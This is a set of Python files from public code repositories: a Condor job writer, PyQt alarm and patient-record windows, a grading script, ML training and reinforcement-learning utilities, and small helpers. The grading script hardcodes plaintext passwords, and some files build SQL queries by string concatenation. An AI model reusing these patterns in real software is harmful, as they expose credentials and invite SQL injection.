/afs!\")\n checkmake_dir(submit_base_dir)\n checkmake_dir(outdir)\n \n for i, sample in enumerate(d):\n if \"_VBF_\" in sample:\n continue\n print(f\"Creating submission dir and writing dag \\\nfiles for sample ({i+1}/{len(d)})\\r\", end=\"\")\n # data samples are channel-dependant\n submit_dir = submit_base_dir.rstrip(\"/\")+f\"/{sample}\"\n eos_outdir = outdir.strip(\"/\")+f\"/{sample}\"\n #xrdcp_create_dir = True in submit script\n if not os.path.exists(submit_dir):\n os.mkdir(submit_dir)\n dagfile = submit_dir+f\"/{sample}.dag\"\n submitfile = submit_dir+f\"/{sample}.submit\"\n afs_exe = submit_dir+f\"/executable.sh\"\n path = d[sample][\"Path\"]\n sum_w = d[sample][\"Sum_w\"]\n sample_id = d[sample][\"Sample_ID\"]\n goodfile = path+\"/goodfiles.txt\"\n if not os.path.exists(afs_exe):\n with open(afs_exe, \"w\") as f:\n print(return_executable(sum_w, year, sample_id, add_htautau), file=f)\n prcs = Popen(f\"chmod 744 {afs_exe}\",shell=True, \n stdin=PIPE, stdout=PIPE, encoding='utf-8')\n out, err = prcs.communicate()\n if err:\n print(err)\n raise ValueError(f\"Unable to chmod {afs_exe} to 744\")\n else:\n print(f\"\\n {afs_exe} already exists.. 
Not creating new one \\n\")\n        if not os.path.exists(goodfile):\n            print(f\"{sample} does not have a goodfile.txt at \\\n{path}\")\n            gfiles = glob(d[sample][\"Path\"]+\"/*.root\")\n        else:\n            gfiles = parse_goodfile_txt(Path(goodfile))\n        # filter files for broken files\n        filechunks = [gfiles[i:i+n_files] for i in range(0, len(gfiles), n_files)]\n        if not os.path.exists(dagfile):\n            with open(dagfile, \"x\") as dfile:\n                for chunk in filechunks:\n                    print(f\"JOB {chunk[0].split('/')[-1]} {submitfile}\", file=dfile)\n                    print(f'VARS {chunk[0].split(\"/\")[-1]} FILES=\"{\" \".join(chunk)}\"', file=dfile)\n                #for file in gfiles:\n                    #print(f\"JOB {file.split('/')[-1]} {submitfile}\", file=dfile)\n                    #print(f'VARS {file.split(\"/\")[-1]} FILES=\"{file}\"', file=dfile)\n        else:\n            print(f\"\\n {dagfile} already exists.. Not creating new one \\n\")\n\n        if not os.path.exists(submitfile):\n            submit_string = return_subfile(outdir=eos_outdir, executable=afs_exe)\n            with open(submitfile, \"x\") as subfile:\n                print(submit_string, file=subfile)\n        else:\n            print(f\"\\n {submitfile} already exists.. Not creating new one \\n\")\n\n\nif __name__ == \"__main__\":\n    parser = make_parser()\n    args = parser.parse_args()\n    main(submit_base_dir=args.submit_base,\n         sample_json=args.json,\n         outdir=args.output_dir,\n         year=args.year,\n         add_htautau=args.add_htautau,\n         n_files=args.n_files)\n","repo_name":"JohanWulff/hbt_data_proc","sub_path":"write_dag.py","file_name":"write_dag.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"36754866507","text":"from PyQt5 import QtWidgets\r\nfrom GUI.notice_window import Window\r\nimport help_file\r\n\r\n\r\nclass NoticeWindow(QtWidgets.QMainWindow):\r\n    def __init__(self):\r\n        super(NoticeWindow, self).__init__()\r\n        self.ui = Window()\r\n        self.ui.setup_ui(self)\r\n\r\n        table_data = help_file.database.pull_data(help_file.active_path)\r\n        active_data = table_data[help_file.active_id]\r\n\r\n        self.ui.name.setText(active_data[1])\r\n        self.ui.date.setText(f'date: {active_data[2]}')\r\n        self.ui.time.setText(f'time: {active_data[3]}:{active_data[4]}')\r\n\r\n        self.ui.deactivate_button.clicked.connect(self.close_window)\r\n\r\n    def close_window(self):\r\n        query = f\"\"\"\r\n            UPDATE data SET\r\n            name = 'undefined',\r\n            days = 'undefined',\r\n            hour = 'undefined',\r\n            minutes = 'undefined'\r\n            WHERE id = {help_file.active_id}\r\n        \"\"\"\r\n        help_file.database.update_data(help_file.active_path, query)\r\n\r\n        raise NameError # to close the window\r\n","repo_name":"ityas/alarm_clock","sub_path":"notice_win.py","file_name":"notice_win.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"3707966331","text":"from typing import Optional\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n\nclass Solution:\n    def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n        def do_from_left(node: TreeNode):\n            if node is None:\n                return []\n            for item in do_from_left(node.left):\n                yield item\n            yield node\n            for item in do_from_left(node.right):\n                yield item\n\n        \n        for i, item in enumerate(do_from_left(root)):\n            if i == k - 1:\n                return item.val\n        \n","repo_name":"dmp2016/LeetCode","sub_path":"Kth Smallest Element in a 
BST.py","file_name":"Kth Smallest Element in a BST.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40490076854","text":"import getpass\nimport pandas as pd\nimport matplotlib.pyplot as plt\nnumerics = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']\nwhile True:\n str1=input(\"Enter the UserName: \")\n str2=getpass.getpass(prompt = \"Enter the password: \")\n # to import excelsheet using pandas\n df = pd.read_excel(r\"C:\\Users\\hp\\Desktop\\class record.xlsx\", sheet_name='Attendance')\n df.set_index('Roll Number', inplace=True)\n df1 = pd.read_excel(r\"C:\\Users\\hp\\Desktop\\class record.xlsx\", sheet_name='Sessional Test 1')\n df1.set_index('Roll Number', inplace=True)\n df2 = pd.read_excel(r\"C:\\Users\\hp\\Desktop\\class record.xlsx\", sheet_name='Sessional Test 2')\n df2.set_index('Roll Number', inplace=True)\n df3 = pd.read_excel(r\"C:\\Users\\hp\\Desktop\\class record.xlsx\", sheet_name='EndTerm Exam 1')\n df3.set_index('Roll Number', inplace=True)\n # to check the eligibility of student according to attendance\n if (str1 == \"Ajay Kumar\" and str2 == \"AjayKumar@22\") or (str1 == \"Gunjan Thakur\" and str2 == \"GunjanThakur@22\") or (str1 == \"Gayatri Koshal\" and str2 == \"GayatriKoshal@22\"):\n s=[\"P\",]\n y=[]\n z=[]\n df[\"Total Presence\"] = df.isin(s).sum(1)\n for i in df[\"Total Presence\"]:\n c=(i/(df.shape[1]-2))*100\n if c >= 75:\n y.append(\"Eligible\")\n z.append(c)\n else:\n y.append(\"Not Eligible\")\n z.append(c)\n df[\"Eligibility\"] = y\n df[\"Attendance %\"] = z\n # to find the percentage of students\n S1=int(input(\"\\nEnter the Maximum Marks in each subject: \"))\n df1[\"Total Marks\"]=df1.sum(axis = 1, numeric_only = True)\n df1[\"Percentage %\"]=(df1[\"Total Marks\"]/(len(df1.select_dtypes(include=numerics).columns)*S1))*100\n S2=int(input(\"\\nEnter the Maximum Marks in each subject: \"))\n df2[\"Total Marks\"]=df2.sum(axis = 1, numeric_only = True)\n df2[\"Percentage %\"]=(df2[\"Total Marks\"]/(len(df2.select_dtypes(include=numerics).columns)*S2))*100\n S3=int(input(\"\\nEnter the Maximum Marks in each subject: \"))\n df3[\"Total Marks\"]=df3.sum(axis = 1, numeric_only = True)\n df3[\"Percentage %\"]=(df3[\"Total Marks\"]/(len(df3.select_dtypes(include=numerics).columns)*S3))*100\n data = {\"Roll Number\":df.index , 'Name':df[\"Name\"], 'ST 1':df1[\"MCP\"], 'ST 2':df2[\"MCP\"], 'ETE 1':df3[\"MCP\"]}\n df4 = pd.DataFrame(data)\n df4.set_index('Roll Number', inplace=True)\n data = {\"Roll Number\":df.index , 'Name':df[\"Name\"], 'ST 1':df1[\"Python\"], 'ST 2':df2[\"Python\"], 'ETE 1':df3[\"Python\"]}\n df5 = pd.DataFrame(data)\n df5.set_index('Roll Number', inplace=True)\n data = {\"Roll Number\":df.index , 'Name':df[\"Name\"], 'ST 1':df1[\"Percentage %\"], 'ST 2':df2[\"Percentage %\"], 'ETE 1':df3[\"Percentage %\"]}\n df6 = pd.DataFrame(data)\n df6.set_index('Roll Number', inplace=True)\n # to grade the student for ST1 Result\n grade1 = []\n for i in df1[\"Percentage %\"] :\n if (i >= 90):\n grade1.append(\"A Grade\")\n elif (90 > i >= 80):\n grade1.append(\"B Grade\")\n elif (80 > i >= 70):\n grade1.append(\"C Grade\")\n elif (70 > i >= 60):\n grade1.append(\"D Grade\")\n elif (60 > i >= 40):\n grade1.append(\"E Grade\")\n else:\n grade1.append(\"Fail\")\n df1[\"Grade\"] = grade1\n # to grade the student for ST2 Result\n grade2 = []\n for i in df2[\"Percentage %\"] :\n if(i >= 90):\n grade2.append(\"A Grade\")\n elif(90 > i >= 80):\n 
grade2.append(\"B Grade\")\n elif(80 > i >= 70):\n grade2.append(\"C Grade\")\n elif(70 > i >= 60):\n grade2.append(\"D Grade\")\n elif(60 > i >= 40):\n grade2.append(\"E Grade\")\n else:\n grade2.append(\"Fail\")\n df2[\"Grade\"] = grade2\n # to grade the student for ETE 1 Result\n grade3 = []\n for i in df3[\"Percentage %\"] :\n if(i >= 90):\n grade3.append(\"A Grade\")\n elif(90 > i >= 80):\n grade3.append(\"B Grade\")\n elif(80 > i >= 70):\n grade3.append(\"C Grade\")\n elif(70 > i >= 60):\n grade3.append(\"D Grade\")\n elif(60 > i >= 40):\n grade3.append(\"E Grade\")\n else:\n grade3.append(\"Fail\")\n df3[\"Grade\"] = grade3\n else:\n print(\"ERROR: 101/102\",end=\"-\")\n # to check the authenticity of the user\n while (str1 == \"Sharad Chauhan\" and str2 == \"SharadChauhan@22\"):\n N = int(input(\"What do you want to do? \"))\n","repo_name":"2210991293/SCM-Project","sub_path":"classrecord.py","file_name":"classrecord.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30901130693","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm # Displays a progress bar\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import Dataset, Subset, DataLoader, random_split, TensorDataset\nimport torchvision.models as models\n\n\n\nimport pickle\n\nfrom sklearn.model_selection import KFold, StratifiedKFold,ShuffleSplit ,train_test_split\n\nimport copy\nimport os\nimport random\n\n\nimport sys,os\nsys.path.append('.')\n\nfrom dataset import EnableDataset\nfrom utils import *\nfrom networks import *\n\n\nfrom itertools import combinations\n\n\ndef run_classifier(mode='bilateral',classifier='CNN',sensor=[\"imu\",\"emg\",\"goin\"],NN_model = None):\n\n\t########## SETTINGS ########################\n\n\tBATCH_SIZE = 32\n\tLEARNING_RATE = 1e-5\n\tWEIGHT_DECAY = 1e-3\n\tNUMB_CLASS = 5\n\tNUB_EPOCH= 200\n\tnumfolds = 10\n\tDATA_LOAD_BOOL = True\n\n\tSAVING_BOOL = True\n\tMODE_SPECIFIC_BOOL= True\n\n\tBAND=10\n\tHOP=10\n\t############################################\n\n\tprint('Number of folds: ', numfolds)\n\n\n\tMODE = mode\n\tCLASSIFIER = classifier\n\tSENSOR = sensor\n\tsensor_str='_'.join(SENSOR)\n\n\n\tMODEL_NAME = './models/Freq-Encoding/bestmodel'+ \\\n\t \t\t'_BATCH_SIZE'+str(BATCH_SIZE)+'_LR'+str(LEARNING_RATE)+'_WD'+str(WEIGHT_DECAY)+'_EPOCH'+str(NUB_EPOCH)+'_BAND'+str(BAND)+'_HOP'+str(HOP)+'.pth'\n\n\t# RESULT_NAME= './results/Freq-Encoding/accuracy'+ \\\n\t \t\t# '_BATCH_SIZE'+str(BATCH_SIZE)+'_LR'+str(LEARNING_RATE)+'_WD'+str(WEIGHT_DECAY)+'_EPOCH'+str(NUB_EPOCH)+'.txt'\n\n\n\tRESULT_NAME= './results/'+CLASSIFIER+'/'+CLASSIFIER+'_'+MODE+'_'+sensor_str+'_BAND'+str(BAND)+'_HOP'+str(HOP)+'_accuracy.txt'\n\n\tSAVE_NAME= './checkpoints/'+CLASSIFIER+'/'+CLASSIFIER+'_'+MODE+'_'+sensor_str+'_BAND'+str(BAND)+'_HOP'+str(HOP)+'mode_specific'+'.pkl'\n\n\tif not os.path.exists('./models/Freq-Encoding'):\n\t\tos.makedirs('./models/Freq-Encoding')\n\n\n\tif not os.path.exists('./results/'+CLASSIFIER):\n\t\tos.makedirs('./results/'+CLASSIFIER)\n\n\tif not os.path.exists('./checkpoints/'+CLASSIFIER):\n\t\tos.makedirs('./checkpoints/'+CLASSIFIER)\n\n\t# if not os.path.exists('./results/Freq-Encoding'):\n\t# \tos.makedirs('./results/Freq-Encoding')\n\n\n\t# Load the dataset and train, val, test splits\n\tprint(\"Loading datasets...\")\n\n\tspectrogramTime = 0.0\n\tif 
SAVING_BOOL:\n\n\t\tBIO_train= EnableDataset(subject_list= ['156','185','186','188','189','190', '191', '192', '193', '194'],data_range=(1, 51),bands=BAND,hop_length=HOP,model_type=CLASSIFIER,sensors=SENSOR,mode=MODE,mode_specific = MODE_SPECIFIC_BOOL)\n\t\tspectrogramTime += BIO_train.spectrogramTime\n\t\tsave_object(BIO_train,SAVE_NAME)\n\telse:\n\t\twith open(SAVE_NAME, 'rb') as input:\n\t\t BIO_train = pickle.load(input)\n\t# BIO_train= EnableDataset(subject_list= ['156'],data_range=(1, 8),bands=BAND,hop_length=HOP,model_type=CLASSIFIER,sensors=SENSOR,mode=MODE,mode_specific = MODE_SPECIFIC_BOOL)\n\n\n\n\n\n\tINPUT_NUM=BIO_train.input_numb\n\n\twholeloader = DataLoader(BIO_train, batch_size=len(BIO_train))\n\n\n\tdevice = \"cuda\" if torch.cuda.is_available() else \"cpu\" # Configure device\n\tprint('GPU USED?',torch.cuda.is_available())\n\n\tif NN_model == 'RESNET18':\n\t\tmodel = MyResNet18() # use resnet\n\t\tmodel.conv1 = nn.Conv2d(INPUT_NUM, 64, kernel_size=5, stride=1, padding=2)\n\t\tmodel.fc = nn.Linear(517 ,NUMB_CLASS)\n\telse:\n\t\tmodel = Network_modespecific(INPUT_NUM,NUMB_CLASS)\n\tmodel = model.to(device)\n\n\tcriterion = nn.CrossEntropyLoss()\n\toptimizer = optim.Adam(model.parameters(), lr=LEARNING_RATE, weight_decay=WEIGHT_DECAY)\n\tnum_epoch = NUB_EPOCH\n\n\tinit_state = copy.deepcopy(model.state_dict())\n\tinit_state_opt = copy.deepcopy(optimizer.state_dict())\n\n\tone_hot_embed= torch.eye(5)\n\n\tfor batch, label, dtype, prevlabels in tqdm(wholeloader,disable=DATA_LOAD_BOOL):\n\t\tX = batch\n\t\ty = label\n\t\ttypes = dtype\n\t\tprevlabel = prevlabels\n\n\taccuracies =[]\n\tss_accuracies=[]\n\ttr_accuracies=[]\n\tinferenceTime = 0.0\n\ttotal_predictions = 0\n\n\n\tskf = KFold(n_splits = numfolds, shuffle = True)\n\ti = 0\n\n\n\ttrain_class=trainclass(model,optimizer,DATA_LOAD_BOOL,device,criterion,MODEL_NAME)\n\n\tfor train_index, test_index in skf.split(X, y):\n\n\t\tmodel.load_state_dict(init_state)\n\t\toptimizer.load_state_dict(init_state_opt)\n\n\t\tX_train, X_test = X[train_index], X[test_index]\n\t\ty_train, y_test = y[train_index], y[test_index]\n\t\ttypes_train, types_test = types[train_index], types[test_index]\n\t\tonehot_train, onehot_test = one_hot_embed[prevlabel[train_index]], one_hot_embed[prevlabel[test_index]]\n\n\n\t\ttrain_dataset = TensorDataset( X_train, y_train, types_train,onehot_train)\n\t\ttest_dataset = TensorDataset( X_test, y_test, types_test,onehot_test)\n\n\t\ttrainloader = DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True)\n\t\ttestloader = DataLoader(test_dataset, batch_size=BATCH_SIZE)\n\n\t\tprint(\"######################Fold:{}#####################3\".format(i+1))\n\t\ttrain_class.train_modesp(trainloader,num_epoch)\n\n\t\tmodel.load_state_dict(torch.load(MODEL_NAME))\n\n\t\t# print(\"Evaluate on test set\")\n\t\taccs,ss_accs,tr_accs,inf_time,num_preds=train_class.evaluate_modesp(testloader)\n\t\taccuracies.append(accs)\n\t\tss_accuracies.append(ss_accs)\n\t\ttr_accuracies.append(tr_accs)\n\n\t\tinferenceTime += inf_time\n\t\ttotal_predictions += num_preds\n\n\t\ti +=1\n\n\tprint('saved on the results')\n\n\n\t# with open(RESULT_NAME, 'w') as f:\n\t# \tfor item in accuracies:\n\t# \t\tf.write(\"%s\\n\" % item)\n\t# f.close()\n\n\tinferenceTime = inferenceTime/total_predictions\n\n\tprint('writing...')\n\twith open(RESULT_NAME, 'w') as f:\n\t\tf.write('total ')\n\t\tfor item in accuracies:\n\t\t\tf.write(\"%s \" % item)\n\t\tf.write('\\n')\n\t\tf.write('steadystate ')\n\t\tfor item in ss_accuracies:\n\t\t\tf.write(\"%s 
\" % item)\n\t\tf.write('\\n')\n\t\tf.write('transitional ')\n\t\tfor item in tr_accuracies:\n\t\t\tf.write(\"%s \" % item)\n\t\tf.write('\\n')\n\n\t\tf.write('spectrogram time %s' % spectrogramTime)\n\t\tf.write('\\n')\n\t\tf.write('inference time %s' % inferenceTime)\n\tf.close()\n\n\nclassifiers=['CNN']\nsensors=[\"imu\",\"emg\",\"goin\"]\n# modes = ['bilateral','ipsilateral','contralateral']\nmodes = ['bilateral']\n# NNMODEL = 'RESNET18'\nNNMODEL = 'bionet'\nfor classifier in classifiers:\n\tfor i in range(3,4):\n\t\tfor combo in combinations(sensors,i):\n\t\t\tsensor = [item for item in combo]\n\t\t\tfor mode in modes:\n\t\t\t\tprint(classifier, sensor, mode)\n\t\t\t\trun_classifier(mode=mode,classifier=classifier,sensor=sensor,NN_model = NNMODEL)","repo_name":"Rishi-Patel/Human-Activity-Classification","sub_path":"Freq-Encoding/freq_encoding_mode_train.py","file_name":"freq_encoding_mode_train.py","file_ext":"py","file_size_in_byte":6310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31145127146","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass ReplayBuffer:\n \"\"\"\n A simple FIFO experience replay buffer for DDPG agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size):\n self.obs_buf = np.zeros(combined_shape(size, obs_dim), dtype=np.float32)\n self.obs2_buf = np.zeros(combined_shape(size, obs_dim), dtype=np.float32)\n self.act_buf = np.zeros(combined_shape(size, act_dim), dtype=np.float32)\n self.rew_buf = np.zeros(size, dtype=np.float32)\n self.done_buf = np.zeros(size, dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n self.obs_buf[self.ptr] = obs\n self.obs2_buf[self.ptr] = next_obs\n self.act_buf[self.ptr] = act\n self.rew_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr+1) % self.max_size\n self.size = min(self.size+1, self.max_size)\n\n def sample_batch(self, batch_size=32):\n idxs = np.random.randint(0, self.size, size=batch_size)\n batch = dict(obs=self.obs_buf[idxs],\n obs2=self.obs2_buf[idxs],\n act=self.act_buf[idxs],\n rew=self.rew_buf[idxs],\n done=self.done_buf[idxs])\n return {k: torch.as_tensor(v, dtype=torch.float32) for k,v in batch.items()}\n\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=(256,256),\n activation=nn.ReLU):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n act_limit = action_space.high[0]\n\n # build policy and value functions\n self.pi = MLPActor(obs_dim, act_dim, hidden_sizes, activation, act_limit)\n self.q = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation)\n\n def act(self, obs):\n with torch.no_grad():\n return self.pi(obs).numpy()\n\n\nclass MLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation, act_limit):\n super().__init__()\n pi_sizes = [obs_dim] + list(hidden_sizes) + [act_dim]\n self.pi = mlp(pi_sizes, activation, nn.Tanh)\n self.act_limit = act_limit\n\n def forward(self, obs):\n # Return output from network scaled to action space limits.\n return self.act_limit * self.pi(obs)\n\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.q = mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n\n def forward(self, obs, act):\n q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to 
ensure q has right shape.\n\n# Set up function for computing DDPG Q-loss\ndef compute_loss_q(data, net, targ_net, gamma):\n o, a, r, o2, d = data['obs'], data['act'], data['rew'], data['obs2'], data['done']\n\n q = net.q(o,a)\n\n # Bellman backup for Q function\n with torch.no_grad():\n q_pi_targ = targ_net.q(o2, targ_net.pi(o2))\n backup = r + gamma * (1 - d) * q_pi_targ\n\n # MSE loss against Bellman backup\n loss_q = ((q - backup)**2).mean()\n\n # Useful info for logging\n loss_info = dict(QVals=q.detach().numpy())\n\n return loss_q, loss_info\n\n# Set up function for computing DDPG pi loss\ndef compute_loss_pi(data, net):\n o = data['obs']\n q_pi = net.q(o, net.pi(o))\n return -q_pi.mean()\n\n\ndef mlp(sizes, activation, output_activation=nn.Identity):\n \"\"\"\n Build generic Neural Net for Actor/Critic.\n Inputs\n Neural Net Size = [Observation Space of Sim x Action Space]\n Activation = ReLU \n Observation Space\n Output\n Action \n \"\"\"\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act(), nn.Dropout()]\n return nn.Sequential(*layers)\n\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\n\n","repo_name":"nfragakis/Formulating-Emotions-in-Reinforcement-Learning-Agents","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"13636368894","text":"'''\nGiven json file of landscape with fitness values and csv file with corresponding eigen_cent values\n Read json landscape into parsed_json\n Read eigen_cent values into dictionary\n For every id in json-nodes\n print out json of node - id, group, fitness, eig_cent\n For every link in json-links\n print out as is (to be processed by add fit, eig_cent scores script)\n'''\nimport sys, json\n\ndef file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1\n\njson_filename = sys.argv[1]\npeaks_filename = sys.argv[2]\noutput_filename = sys.argv[3]\n\nfr_landscape = open(json_filename, \"r\")\nfr_peaks = open(peaks_filename, \"r\")\nfw = open(output_filename, \"w\")\n\nnodes_peaks = list()\n\n\n'''Read nodes of landscape and eigen_cent values from files'''\njson_landscape_string = fr_landscape.read()\nparsed_json = json.loads(json_landscape_string)\n\nfor line in fr_peaks:\n nodes_peaks.append(line.strip())\n\n'''Write Nodes as JSON with all values in output file'''\nfw.write(\"{\\n\\\"nodes\\\": [\\n\")\ni = 0\nfor i in range(0,len(parsed_json[\"nodes\"])):\n node = parsed_json[\"nodes\"][i]\n is_peak = False\n if node[\"id\"] in nodes_peaks:\n print(str(node[\"id\"]))\n is_peak = True\n fw.write(\"{\\\"id\\\":\\\"\" + str(node[\"id\"]) + \"\\\", \\\"fitness\\\":\\\"\" + str(node[\"fitness\"]) + \"\\\", \\\"eigen_cent\\\":\\\"\" + node[\"eigen_cent\"] + \"\\\", \\\"is_peak\\\": \\\"\" + str(is_peak) + \"\\\"}\")\n if i < len(parsed_json[\"nodes\"])-1:\n fw.write(\",\\n\")\n else:\n fw.write(\"\\n\")\n i += 1\n\n'''Write Links as JSON as they are without calculated values in output file'''\nfw.write(\"],\\n\\\"links\\\": [\\n\")\ni = 0\n\nfor i in range(0,len(parsed_json[\"links\"])):\n link = parsed_json[\"links\"][i]\n fw.write(\"{\\\"source\\\":\\\"\" + link[\"source\"] + 
\"\\\", \\\"target\\\":\\\"\" + link[\"target\"] + \"\\\", \\\"fit_val\\\":\\\"\" + link[\"fit_val\"] + \"\\\", \\\"eigen_val\\\":\\\"\" + link[\"eigen_val\"] +\"\\\"}\")\n if i < len(parsed_json[\"links\"]) - 1:\n fw.write(\",\\n\")\n else:\n fw.write(\"\\n\")\n i += 1\n\nfw.write(\"]\\n}\\n\")\n","repo_name":"thomasgreen79/Landscape_Vis","sub_path":"d3_examples/gen_scripts/add_is_peak_to_final_json.py","file_name":"add_is_peak_to_final_json.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7518550310","text":"from pytorch_lightning import LightningModule, LightningDataModule, seed_everything\nfrom hydra.utils import instantiate, get_class\nfrom omegaconf import DictConfig, OmegaConf\n\n\ndef load_experiment(path: str, checkpoint: str = 'last.ckpt'):\n \"\"\"\n Loads an existing model and its dataloader.\n\n args:\n path (string): The path to the log folder\n checkpoint (string): the name of the checkpoint file\n \"\"\"\n # load conf\n config: DictConfig = OmegaConf.load(path + '/.hydra/config.yaml')\n\n # reinitialize model and datamodule\n model = get_class(config.model._target_)\n datamodule: LightningDataModule = instantiate(config.datamodule)\n datamodule.setup()\n\n if \"seed\" in config:\n seed_everything(config.seed)\n\n model = model.load_from_checkpoint(path + '/checkpoints/' + checkpoint)\n\n return model, datamodule, config\n","repo_name":"kredde/pytorch-lightning-hydra-mlflow","sub_path":"src/utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"43379581034","text":"import os\nimport shutil\nimport sqlite3\n\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QWidget, QDesktopWidget, QApplication, QLineEdit, QComboBox, QPlainTextEdit, QPushButton, \\\n QListWidget, QFileDialog\n\nfrom userdataclass import jsondata\n\n\nclass EditWindow(QWidget):\n def __init__(self, ids):\n super().__init__()\n uic.loadUi(\"ui/editrecord.ui\", self)\n\n # id setting\n self.id = self.findChild(QLineEdit, \"id\")\n self.id.setText(str(ids))\n self.name = self.findChild(QLineEdit, 'name')\n self.age = self.findChild(QLineEdit, 'age')\n self.address = self.findChild(QLineEdit, 'address')\n self.sex = self.findChild(QComboBox, 'sex')\n self.cc = self.findChild(QPlainTextEdit, 'cc')\n self.oe = self.findChild(QPlainTextEdit, 'oe')\n self.rf = self.findChild(QPlainTextEdit, 'rf')\n self.pathreport = self.findChild(QPlainTextEdit, 'pathreport')\n self.addRediology = self.findChild(QPushButton, 'addRediology')\n self.listRediology = self.findChild(QListWidget, 'listRadiology')\n self.addMri = self.findChild(QPushButton, 'addMri')\n self.listMri = self.findChild(QListWidget, 'listMri')\n self.addXray = self.findChild(QPushButton, 'addXray')\n self.listXray = self.findChild(QListWidget, 'listXray')\n self.addCtscan = self.findChild(QPushButton, 'addCtscan')\n self.listCtscan = self.findChild(QListWidget, 'listCtscan')\n self.addPics = self.findChild(QPushButton, 'addPics')\n self.listPics = self.findChild(QListWidget, 'listPics')\n self.dxs = self.findChild(QPlainTextEdit, 'dxs')\n self.comments = self.findChild(QPlainTextEdit, 'comments')\n self.saveChanges = self.findChild(QPushButton, 'savechanges')\n\n self.loadData(ids)\n\n # adding signal to the buttons\n self.addRediology.clicked.connect(self.addRediology_clicked)\n 
self.addMri.clicked.connect(self.addMri_clicked)\n        self.addCtscan.clicked.connect(self.addCtscan_clicked)\n        self.addXray.clicked.connect(self.addXray_clicked)\n        self.addPics.clicked.connect(self.addPics_clicked)\n        self.saveChanges.clicked.connect(self.saveChanges_clicked)\n\n    def location_on_the_screen(self):\n        qr = self.frameGeometry()\n        cp = QDesktopWidget().availableGeometry().center()\n        qr.moveCenter(cp)\n        self.move(qr.topLeft())\n\n    def addRediology_clicked(self):\n        filepath = QFileDialog.getOpenFileName()\n        # print(filepath[0])\n        self.listRediology.addItem(filepath[0])\n\n    def addMri_clicked(self):\n        filepath = QFileDialog.getOpenFileName()\n        # print(filepath[0])\n        self.listMri.addItem(filepath[0])\n\n    def addCtscan_clicked(self):\n        filepath = QFileDialog.getOpenFileName()\n        # print(filepath[0])\n        self.listCtscan.addItem(filepath[0])\n\n    def addXray_clicked(self):\n        filepath = QFileDialog.getOpenFileName()\n        # print(filepath[0])\n        self.listXray.addItem(filepath[0])\n\n    def addPics_clicked(self):\n        filepath = QFileDialog.getOpenFileName()\n        # print(filepath[0])\n        self.listPics.addItem(filepath[0])\n\n    def loadPics(self, jointpath, flag):\n        paths = jointpath.split(',')\n        if flag == \"radiology\":\n            for item in paths:\n                self.listRediology.addItem(item)\n        elif flag == \"mri\":\n            for item in paths:\n                self.listMri.addItem(item)\n        elif flag == \"xray\":\n            for item in paths:\n                self.listXray.addItem(item)\n        elif flag == \"ctscan\":\n            for item in paths:\n                self.listCtscan.addItem(item)\n        elif flag == \"pics\":\n            for item in paths:\n                self.listPics.addItem(item)\n\n# this function loads a record from the database file and populates the form\n    def loadData(self, id):\n        datapath = jsondata()\n        database = datapath.getdatapath() + \"/database.db\"\n        conn = sqlite3.connect(database)\n        sql = \"SELECT * FROM entry WHERE id=\" + str(id)\n        cur = conn.cursor()\n        for row in cur.execute(sql):\n            self.name.setText(row[2])\n            if row[3] == \"male\" or row[3] == \"Male\":\n                self.sex.setCurrentText(\"Male\")\n            elif row[3] == \"female\" or row[3] == \"Female\":\n                self.sex.setCurrentText(\"Female\")\n            else:\n                self.sex.setCurrentText(\"Others\")\n            self.age.setText(row[4])\n            self.address.setText(row[5])\n            self.cc.insertPlainText(row[6])\n            self.oe.insertPlainText(row[7])\n            self.rf.insertPlainText(row[8])\n            self.pathreport.insertPlainText(row[9])\n            self.loadPics(row[10], 